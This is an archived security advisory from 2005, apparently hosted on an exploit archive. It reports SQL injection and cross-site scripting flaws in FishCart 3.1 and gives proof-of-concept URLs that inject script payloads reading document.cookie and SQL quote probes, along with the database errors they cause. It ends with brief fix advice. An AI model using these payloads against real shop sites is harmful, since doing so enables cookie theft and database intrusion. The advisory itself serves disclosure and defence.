what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

fishcartSQLXSS.txt

fishcartSQLXSS.txt
Posted Jul 15, 2005
Authored by Diabolic Crab | Site hackerscenter.com

FishCart 3.1 suffers from multiple SQL injection and cross site scripting flaws.

tags | exploit, xss, sql injection
SHA-256 | c023c88e9e8a37a65fd2b6db46305dbbb93476aca0cb1765c8a1a959aa1e5e30

fishcartSQLXSS.txt

Change Mirror Download

------=_NextPart_001_005A_01C55049.DEF610F0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. =
Learn more at http://www.digitalparadox.org/services.ah

***SPECIAL OFFER***
Hire my auditing services, if I dont find anything, its FREE..!! =
http://www.digitalparadox.org/services.ah

Looking for Publishers intrested in my Php Secure Coding Book.

Severity: High
Title: Multiple SQL injections and XSS in FishCart 3.1
Date: 4/05/2005

Vendor: FishNet Inc
Vendor Website: http://www.fishnetinc.com
Summary: There are, multiple sql injections and xss in fishcart 3.1.


Proof of Concept Exploits:=20

http://example.com/demo31/display.php?cartid=3D200505024231092&zid=3D1&li=
d=3D1&nlst=3D'"><script>alert(document.cookie)</script>&olimit=3D0&cat=3D=
&key1=3D&psku=3D
XSS

http://example.com/demo31/display.php?cartid=3D200505024231092&zid=3D1&li=
d=3D1&nlst=3Dy&olimit=3D0&cat=3D&key1=3D&psku=3D'SQL_INJECTION
SQL INJECTION

Database error: Invalid SQL: select count(*) as cnt from =
cvsdemo31prod,cvsdemo31prodlang where nzid=3D1 and nprodsku=3Dprodsku =
and prodzid=3D1 and nprodsku=3Dprodlsku and prodlzid=3D1 and =
prodlid=3D1prodsku=3D'''SQL_INJECTION' and prodlsku=3D'''SQL_INJECTION' =
and prodzid=3D1 and prodzid=3Dprodlzid and prodlid=3D1 and =
(produseinvq=3D0 or (produseinvq=3D1 and prodinvqty>0))
MySQL Error: 1054 (Unknown column 'nzid' in 'where clause')
Session halted.


http://example.com/demo31/upstnt.php?zid=3D1&lid=3D1&cartid=3D'SQL_INJECT=
ION
SQL INJECTION

Database error: Invalid SQL: select sku,qty from cvsdemo31oline where =
orderid=3D''SQL_INJECTION'
MySQL Error: 1064 (You have an error in your SQL syntax near =
'SQL_INJECTION'' at line 1)
Session halted.

http://example.com/demo31/upstracking.php?trackingnum=3D'"><script>alert(=
document.cookie)</script>&reqagree=3Dchecked&m=3D
XSS


http://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3D'"><s=
cript>alert(document.cookie)</script>&m=3D
XSS

http://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3Dcheck=
ed&m=3D'"><script>alert(document.cookie)</script>
XSS


Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), =
mysql_real_escape_string() and other functions for input validation =
before passing user input to the mysql database, or before echoing data =
on the screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:=20
These vulnerabilities have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://digitalparadox.org/.




-------------------------------------------------------------------------=
-------

Sincerely,=20
Diabolic Crab=20



------=_NextPart_001_005A_01C55049.DEF610F0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2627" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =
Security Group]=20
<A =
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
BR>[dP=20
Security] <A=20
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></FONT>=
</DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =
servers,=20
scripts, networks, etc. Learn more at <A=20
href=3D"http://www.digitalparadox.org/services.ah">http://www.digitalpara=
dox.org/services.ah</A></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>***SPECIAL OFFER***<BR>Hire my auditing =
services,=20
if I dont find anything, its FREE..!! <A=20
href=3D"http://www.digitalparadox.org/services.ah">http://www.digitalpara=
dox.org/services.ah</A></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Looking for Publishers intrested in my =
Php Secure=20
Coding Book.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Multiple SQL =
injections=20
and XSS in FishCart 3.1<BR>Date: 4/05/2005</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: FishNet Inc<BR>Vendor Website: =
<A=20
href=3D"http://www.fishnetinc.com">http://www.fishnetinc.com</A><BR>Summa=
ry: There=20
are, multiple sql injections and xss in fishcart 3.1.</FONT></DIV>
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>
<DIV><BR>Proof of Concept Exploits: </DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://example.com/demo31/display.php?cartid=3D200505024231092&am=
p;zid=3D1&lid=3D1&nlst=3D'"><script>alert(document.cookie)</=
script>&olimit=3D0&cat=3D&key1=3D&psku">http://example.co=
m/demo31/display.php?cartid=3D200505024231092&zid=3D1&lid=3D1&amp=
;nlst=3D'"><script>alert(document.cookie)</script>&oli=
mit=3D0&cat=3D&key1=3D&psku</A>=3D<BR>XSS</DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://example.com/demo31/display.php?cartid=3D200505024231092&am=
p;zid=3D1&lid=3D1&nlst=3Dy&olimit=3D0&cat=3D&key1=3D&=
amp;psku=3D'SQL_INJECTION">http://example.com/demo31/display.php?cartid=3D=
200505024231092&zid=3D1&lid=3D1&nlst=3Dy&olimit=3D0&c=
at=3D&key1=3D&psku=3D'SQL_INJECTION</A><BR>SQL=20
INJECTION</DIV>
<DIV>&nbsp;</DIV>
<DIV>Database error: Invalid SQL: select count(*) as cnt from=20
cvsdemo31prod,cvsdemo31prodlang where nzid=3D1 and nprodsku=3Dprodsku =
and prodzid=3D1=20
and nprodsku=3Dprodlsku and prodlzid=3D1 and =
prodlid=3D1prodsku=3D'''SQL_INJECTION' and=20
prodlsku=3D'''SQL_INJECTION' and prodzid=3D1 and prodzid=3Dprodlzid and =
prodlid=3D1 and=20
(produseinvq=3D0 or (produseinvq=3D1 and prodinvqty>0))<BR>MySQL =
Error: 1054=20
(Unknown column 'nzid' in 'where clause')<BR>Session halted.</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://example.com/demo31/upstnt.php?zid=3D1&lid=3D1&cart=
id=3D'SQL_INJECTION">http://example.com/demo31/upstnt.php?zid=3D1&lid=
=3D1&cartid=3D'SQL_INJECTION</A><BR>SQL=20
INJECTION</DIV>
<DIV>&nbsp;</DIV>
<DIV>Database error: Invalid SQL: select sku,qty from cvsdemo31oline =
where=20
orderid=3D''SQL_INJECTION'<BR>MySQL Error: 1064 (You have an error in =
your SQL=20
syntax near 'SQL_INJECTION'' at line 1)<BR>Session halted.</DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://example.com/demo31/upstracking.php?trackingnum=3D'"><=
script>alert(document.cookie)</script>&reqagree=3Dchecked&m">http=
://example.com/demo31/upstracking.php?trackingnum=3D'"><script>a=
lert(document.cookie)</script>&reqagree=3Dchecked&m</A>=3D<=
BR>XSS</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://example.com/demo31/upstracking.php?trackingnum=3D&reqa=
gree=3D'"><script>alert(document.cookie)</script>&m">http://exam=
ple.com/demo31/upstracking.php?trackingnum=3D&reqagree=3D'"><sc=
ript>alert(document.cookie)</script>&m</A>=3D<BR>XSS</DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://example.com/demo31/upstracking.php?trackingnum=3D&reqa=
gree=3Dchecked&m=3D'"><script>alert(document.cookie)</script">ht=
tp://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3Dche=
cked&m=3D'"><script>alert(document.cookie)</script</A>&gt=
;<BR>XSS</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20
mysql_escape_string(), mysql_real_escape_string() and other functions =
for input=20
validation before passing user input to the mysql database, or before =
echoing=20
data on the screen, would solve these problems.</DIV>
<DIV>&nbsp;</DIV>
<DIV>Keep your self updated, Rss feed at: <A=20
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=
h</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>Author: <BR>These vulnerabilities have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>.</DIV>=

<DIV>&nbsp;</DIV>
<DIV></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV>
<HR>
<BR>Sincerely, <BR>Diabolic Crab <BR><IMG=20
src=3D"mhtml:mid://00000083/!http://digitalparadox.org/dc.gif"=20
border=3D0><BR><BR></DIV></BODY></HTML>

------=_NextPart_001_005A_01C55049.DEF610F0--
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close